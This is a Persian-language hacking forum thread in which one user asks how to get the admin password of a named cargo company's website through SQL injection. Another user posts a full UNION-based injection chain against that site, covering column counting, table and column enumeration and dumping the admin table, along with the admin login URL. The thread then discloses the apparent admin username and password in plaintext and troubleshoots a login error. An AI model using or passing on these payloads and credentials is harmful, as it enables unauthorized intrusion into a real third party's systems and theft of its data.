OOOHHHAAACCCKKKOOO

اشکال در باگ sql

6 ارسال در این موضوع قرار دارد

با سلام. بببخشید من در پیدا کردن پسورد یک سایت با باگ sql مشکل دارم. تعداد ستون های سایت رو پیدا می کنم اما بعدش خوب پیش نمیره. آدرس تارگت http://www.rightwaycargo.com هستش و تعداد ستون هاش:

http://www.rightwaycargo.com/news_more.php?id=37+order+by+6

البته فکر کنم من تعداد ستون هاش رو اشتباه پیدا کردم.

لطفا راهنمایی کنید.

با تشکر.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

 

http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6--+

 

 

http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6--+

 

www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6--+

 

http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(0x3c666f6e7420636f6c6f723d7265643e,str_admin_user_name,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,str_admin_password,0x3c2f666f6e743e)+FROM+tbl_admin),3,4,5,6--+

 

 

ادمین پیج :

http://www.rightwaycargo.com/webadmin/index.php

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1397/06/13, 20:15:30، LordBlack گفته است :

 


http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6--+

 

 


http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6--+

 


www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6--+

 


http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(0x3c666f6e7420636f6c6f723d7265643e,str_admin_user_name,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,str_admin_password,0x3c2f666f6e743e)+FROM+tbl_admin),3,4,5,6--+

 

 

ادمین پیج :


http://www.rightwaycargo.com/webadmin/index.php

 

آهان ممنون. ببخشید فقط الان یوزرنیم چیه پسورد چیه؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 19 ساعت قبل، LordBlack گفته است :

در step چهارم username و password که مشخص !

UserName admin
Password : rightway@qatar

آهان ممنون. البته منظور من این بود که یوزرنیم admin هست یا پسورد. چون جلوشون ننوشته بود یوزرنیم یا پسورد.

البته نمیدونم چرا من نتونستم با این یوزرنیم و پسورد وارد بشم!!!! وقتی یوزرنیم پسورد رو میزنم میاره

 Fatal error: Call to undefined function session_register() in /home/rightwaycargo/public_html/webadmin/index.php on line 17

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1397/06/17, 10:32:01، OOOHHHAAACCCKKKOOO گفته است :

آهان ممنون. البته منظور من این بود که یوزرنیم admin هست یا پسورد. چون جلوشون ننوشته بود یوزرنیم یا پسورد.

البته نمیدونم چرا من نتونستم با این یوزرنیم و پسورد وارد بشم!!!! وقتی یوزرنیم پسورد رو میزنم میاره

 Fatal error: Call to undefined function session_register() in /home/rightwaycargo/public_html/webadmin/index.php on line 17

 

اگه یه کم دقت کنید بد نیست همه چیز رو که نباید گفت.

این ارور مربوط میشه به سشن ها که تابع ession_register() از نسخه ی ۵٫۴ به بعد به دلایل امنیتی حذف شده متاسفانه سایت ارور میده و نمیشه ورژن php رو مشاهده کرد.

در ورژن های ۵٫۴ به بعد باید از $_SESSION به جای ession_register() استفاده کرد. برای استفاده از ession_register() در نسخه ی های پایین تر باید دستور register_globals در php فعال باشد.

موفق باشید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری